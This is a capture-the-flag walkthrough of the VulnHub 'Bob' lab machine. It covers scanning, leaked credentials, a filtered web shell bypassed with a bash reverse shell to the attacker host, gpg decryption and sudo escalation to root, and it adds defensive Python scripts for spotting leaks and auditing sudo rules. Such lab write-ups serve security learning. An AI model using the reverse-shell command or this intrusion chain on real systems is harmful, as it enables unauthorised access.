Bob
Author: jason_huawen
Target information
Name: Bob: 1.0.1
URL:
https://www.vulnhub.com/entry/bob-101,226/
Identifying the target host IP address
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:a5:49:23 1 60 PCS Systemtechnik GmbH
192.168.56.101 08:00:27:6f:48:2f 1 60 PCS Systemtechnik GmbH
Kali Linux's built-in netdiscover tool identifies the target host IP address as 192.168.56.101.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.101 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 05:06 EST
Nmap scan report for 192.168.56.101
Host is up (0.00035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84f2f8e5ed3e14f393d41e4c413ba2a9 (RSA)
| 256 5b98c74f846efd566a351683aa9ceaf8 (ECDSA)
|_ 256 391656fb4e0f508540d3532241433815 (ED25519)
MAC Address: 08:00:27:6F:48:2F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.11 seconds
The NMAP scan shows that the target host has 2 open ports: 80 (HTTP) and 25468 (SSH).
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ curl http://192.168.56.101/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ curl http://192.168.56.101/lat_memo.html
<html>
<body>
<div id="back">
<div id="banner" alt="School Banner">
<img src="school_badge.png" id="logo">
<div id="bannertext">
<h1> Milburg Highschool </h1>
<a href="index.html">Home</a>
<a href="news.html">News</a>
<a href="about.html">About Us</a>
<a href="contact.html">Contact Us</a>
<a href="login.html">Login</a>
</div>
</div>
<div id="memocontainer">
<p>
Memo sent at GMT+10:00 2:37:42 by User: Bob
<br>
Hey guys IT here don't forget to check your emails regarding the recent security breach.
There is a web shell running on the server with no protection but it should be safe as
I have ported over the filter from the old windows server to our new linux one. Your email
will have the link to the shell.<br>
<br>
-Bob
</p>
</div>
</div>
</body>
</html>
This shows that there is a user named bob and that the web shell's command execution has a filtering mechanism.
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ curl http://192.168.56.101/passwords.html
<!-- N.T.S Get Sticky Notes to Write Passwords in
-Bob
-->
<!--
-=====Passwords:==-<!
=======-
-->
<!--
-=====WEBSHELL=======-
-->
<!--p
-->
<!--
-====================-
-->
<html>
<body>
Really who made this file at least get a hash of your password to display,
hackers can't do anything with a hash, this is probably why we had a security
breach in the first place. Comeon
people this is basic 101 security! I have moved the file off the server. Don't make me have to clean up the mess everytime
someone does something as stupid as this. We will have a meeting about this and other
stuff I found on the server. >:(
<br>
-Bob
</fieldset>
</body>
</html>
Could this be bob's password? Either way, let's try it first.
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ ssh bob@192.168.56.101 -p 25468
The authenticity of host '[192.168.56.101]:25468 ([192.168.56.101]:25468)' can't be established.
ED25519 key fingerprint is SHA256:OY3LVMIRHTASgrwg8mXjqq8nFPrcwLV7lhRz0gpjwq4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.101]:25468' (ED25519) to the list of known hosts.
__ __ _ _ _ _____
| \/ (_) | | / ____|
| \ / |_| | |__ _ _ _ __ __ _ | (___ ___ _ ____ _____ _ __
| |\/| | | | '_ \| | | | '__/ _` | \___ \ / _ \ '__\ \ / / _ \ '__|
| | | | | | |_) | |_| | | | (_| | ____) | __/ | \ V / __/ |
|_| |_|_|_|_.__/ \__,_|_| \__, | |_____/ \___|_| \_/ \___|_|
__/ |
|___/
bob@192.168.56.101's password:
Permission denied, please try again.
bob@192.168.56.101's password:
Permission denied, please try again.
bob@192.168.56.101's password:
That doesn't seem right, so let's look at the web shell instead.
The filter turns out to be weak; after trying a few commands a shell is obtained.
bash -c 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1'
The reverse shell is received on Kali Linux.
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.101] 36358
bash: cannot set terminal process group (514): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Milburg-High:/var/www/html$
www-data@Milburg-High:/var/www/html$ cat .hint
cat .hint
Have you tried spawning a tty shell?
Also don't forget to check for hidden files ;)
www-data@Milburg-High:/var/www/html$ which python
which python
/usr/bin/python
www-data@Milburg-High:/var/www/html$ python -c 'import pty;pty.spawn("/bin/bash")'
<html$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Milburg-High:/var/www/html$
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cat notes.sh
cat notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
Taking the first letter of each line in /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh spells HARPOCRATES, the name of a figure from ancient Greek mythology.
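The acrostic above was read off by hand. As an added example (not part of the original post), the following Python script extracts it automatically: it parses a shell script, keeps only the string argument of each echo line, drops the shebang, clear and any banner line that does not start with a letter, and joins the initials. The NOTES_SH text is a copy of the notes.sh content shown above; the function names are my own.

```python
import re

# Copy of the notes.sh content shown above (embedded so the script runs offline).
NOTES_SH = r'''#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
'''

# Matches `echo "..."`, `echo '...'` or `echo word`; only the string argument is captured.
ECHO_RE = re.compile(r'^\s*echo\s+(?:"([^"]*)"|\'([^\']*)\'|(\S+))\s*$')


def echoed_strings(script):
    """Return the argument of every echo line; shebang, clear, etc. are ignored."""
    strings = []
    for line in script.splitlines():
        m = ECHO_RE.match(line)
        if not m:
            continue
        # Exactly one of the three alternatives matched; take the non-empty group.
        strings.append(next(g for g in m.groups() if g is not None))
    return strings


def acrostic(script):
    """Join the upper-cased first letter of each echoed string that starts with a letter.

    Lines such as the "-= Notes =-" banner start with punctuation and are skipped,
    so decorative output does not pollute the hidden word.
    """
    letters = []
    for s in echoed_strings(script):
        s = s.strip()
        if s and s[0].isalpha():
            letters.append(s[0].upper())
    return "".join(letters)


if __name__ == "__main__":
    print(acrostic(NOTES_SH))  # HARPOCRATES
```

The regex deliberately handles an apostrophe inside a double-quoted string (the "I'm ordering pizza" line), which a naive split on quote characters would break on.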
www-data@Milburg-High:/home/bob$ cat .old_passwordfile.html
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
Here we have the passwords for jc and other users.
However, running the gpg decryption directly on the target host fails:
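Both passwords.html (credentials and hints left in HTML comments) and .old_passwordfile.html (plaintext user:password pairs in the page body) are the kind of leak a web-root review should catch before an attacker does. As an added example, not code from the original post, the script below uses Python's html.parser to walk a document, scanning comments and text separately, and reports `user:password` style lines and password-related keywords. It records only the user name of a credential hit, so the report itself does not re-leak the secret. The sample document is constructed from the two files shown on this page; the class and function names are my own.

```python
import re
from html.parser import HTMLParser

# A line that looks like "username:password" (value at least 4 non-space chars).
CRED_LINE = re.compile(r'^\s*([A-Za-z][\w.-]{0,31}):(\S{4,})\s*$')
# Words that usually mean a human left a hint about a secret nearby.
KEYWORDS = re.compile(r'\b(password|passwd|pwd|credential)s?\b', re.IGNORECASE)


class LeakScanner(HTMLParser):
    """Collects (where, kind, detail) findings from comments and visible text."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def _scan(self, where, text):
        for line in text.splitlines():
            m = CRED_LINE.match(line)
            if m:
                # Report the account name only; never copy the password into the report.
                self.findings.append((where, "credential", m.group(1)))
            elif KEYWORDS.search(line):
                self.findings.append((where, "keyword", line.strip()))

    def handle_comment(self, data):
        self._scan("comment", data)

    def handle_data(self, data):
        self._scan("text", data)


def scan_html(doc):
    """Return the list of findings for one HTML document."""
    parser = LeakScanner()
    parser.feed(doc)
    parser.close()
    return parser.findings


# Constructed sample: the comment from passwords.html plus the body of .old_passwordfile.html.
SAMPLE = """<!-- N.T.S Get Sticky Notes to Write Passwords in
-Bob
-->
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
"""

if __name__ == "__main__":
    for where, kind, detail in scan_html(SAMPLE):
        print(f"{where:8} {kind:10} {detail}")
```

Run it over every .html file under the web root (hidden files included, since .old_passwordfile.html would otherwise be missed); a comment hit is worth a manual look even when no credential pattern matches, because the hint in passwords.html is exactly that kind of breadcrumb.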
jc@Milburg-High:/home/bob/Documents$ gpg --decrypt /home/bob/Documents/login.txt.gpg
<ts$ gpg --decrypt /home/bob/Documents/login.txt.gpg
gpg: AES encrypted data
gpg: problem with the agent: Permission denied
gpg: encrypted with 1 passphrase
gpg: decryption failed: No secret key
Instead, download login.txt.gpg to the local Kali Linux machine and decrypt it there.
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ wget http://192.168.56.101:8000/login.txt.gpg
--2023-02-01 05:38:50-- http://192.168.56.101:8000/login.txt.gpg
Connecting to 192.168.56.101:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 91 [application/octet-stream]
Saving to: ‘login.txt.gpg’
login.txt.gpg 100%[=====================================================>] 91 --.-KB/s in 0s
2023-02-01 05:38:50 (28.0 MB/s) - ‘login.txt.gpg’ saved [91/91]
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ ls
linpeas.sh login.txt.gpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ gpg -d login.txt.gpg
gpg: keybox '/home/kali/.gnupg/pubring.kbx' created
gpg: AES.CFB encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_
This successfully yields bob's password.
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ ssh bob@192.168.56.101 -p 25468
__ __ _ _ _ _____
| \/ (_) | | / ____|
| \ / |_| | |__ _ _ _ __ __ _ | (___ ___ _ ____ _____ _ __
| |\/| | | | '_ \| | | | '__/ _` | \___ \ / _ \ '__\ \ / / _ \ '__|
| | | | | | |_) | |_| | | | (_| | ____) | __/ | \ V / __/ |
|_| |_|_|_|_.__/ \__,_|_| \__, | |_____/ \___|_| \_/ \___|_|
__/ |
|___/
bob@192.168.56.101's password:
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 8 23:49:12 2018 from 192.168.56.1
bob@Milburg-High:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob),27(sudo)
bob@Milburg-High:~$ sudo -l
sudo: unable to resolve host Milburg-High: Connection refused
[sudo] password for bob:
Matching Defaults entries for bob on Milburg-High:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bob may run the following commands on Milburg-High:
(ALL : ALL) ALL
bob@Milburg-High:~$ sudo /bin/bash
sudo: unable to resolve host Milburg-High: Connection refused
root@Milburg-High:/home/bob# cd /root
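The `sudo -l` output above is the whole privilege-escalation story: bob is in the sudo group with `(ALL : ALL) ALL`, so any compromise of that account is a root compromise. As an added example, not part of the original post, the script below parses `sudo -l` output and flags the rules an administrator should not leave in place: unrestricted commands as root, NOPASSWD entries, and commands that are themselves shells. SUDO_L_OUTPUT is a copy of the output shown above; CONSTRUCTED_NOPASSWD is a made-up second sample used to exercise the tag handling; the function names are my own.

```python
import os
import re

# Copy of the sudo -l output shown above for bob.
SUDO_L_OUTPUT = """Matching Defaults entries for bob on Milburg-High:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User bob may run the following commands on Milburg-High:
    (ALL : ALL) ALL
"""

# Constructed sample (not from the page) with a NOPASSWD rule and a shell in the list.
CONSTRUCTED_NOPASSWD = """User alice may run the following commands on example-host:
    (root) NOPASSWD: /usr/bin/systemctl restart apache2, /usr/bin/bash
"""

USER_HEADER = re.compile(r'^User (\S+) may run the following commands')
# "(runas_user : runas_group) TAG: TAG: command, command"
RULE_RE = re.compile(
    r'^\s*\(([^)]*)\)\s*'
    r'((?:(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|LOG_OUTPUT|MAIL|NOMAIL):\s*)*)'
    r'(.+?)\s*$'
)
SHELLS = {"bash", "sh", "dash", "zsh", "ksh", "su"}


def parse_sudo_l(text):
    """Turn the rule section of `sudo -l` output into a list of rule dicts."""
    rules, user, in_rules = [], None, False
    for line in text.splitlines():
        h = USER_HEADER.match(line)
        if h:
            user, in_rules = h.group(1), True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        runas_user, _, runas_group = (p.strip() for p in runas.partition(":"))
        tagset = {t.strip() for t in tags.split(":") if t.strip()}
        # Commands are comma-separated; arguments containing commas are not handled here.
        for cmd in (c.strip() for c in cmds.split(",") if c.strip()):
            rules.append({"user": user, "runas_user": runas_user,
                          "runas_group": runas_group, "tags": tagset, "command": cmd})
    return rules


def audit(rules):
    """Return (rule label, reason) pairs for rules that deserve review."""
    findings = []
    for r in rules:
        cmd = r["command"]
        label = f"{r['user']}: ({r['runas_user']}) {cmd}"
        if cmd == "ALL" and r["runas_user"] in ("ALL", "root"):
            findings.append((label, "unrestricted: any command as root"))
        if "NOPASSWD" in r["tags"]:
            findings.append((label, "NOPASSWD: no authentication before escalation"))
        if cmd != "ALL" and os.path.basename(cmd.split()[0]) in SHELLS:
            findings.append((label, "grants an interactive shell"))
    return findings


if __name__ == "__main__":
    for label, reason in audit(parse_sudo_l(SUDO_L_OUTPUT)) + audit(parse_sudo_l(CONSTRUCTED_NOPASSWD)):
        print(f"{label:45} {reason}")
```

The fix on a real host is the same in every case: replace the blanket rule with the specific commands the account needs, keep password prompting on, and avoid listing shells or editors that can spawn one.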
Tags: __, kali, 192.168, Vulnhub, 56.101, bob, target machine, Bob
From: https://www.cnblogs.com/jason-huawen/p/17083882.html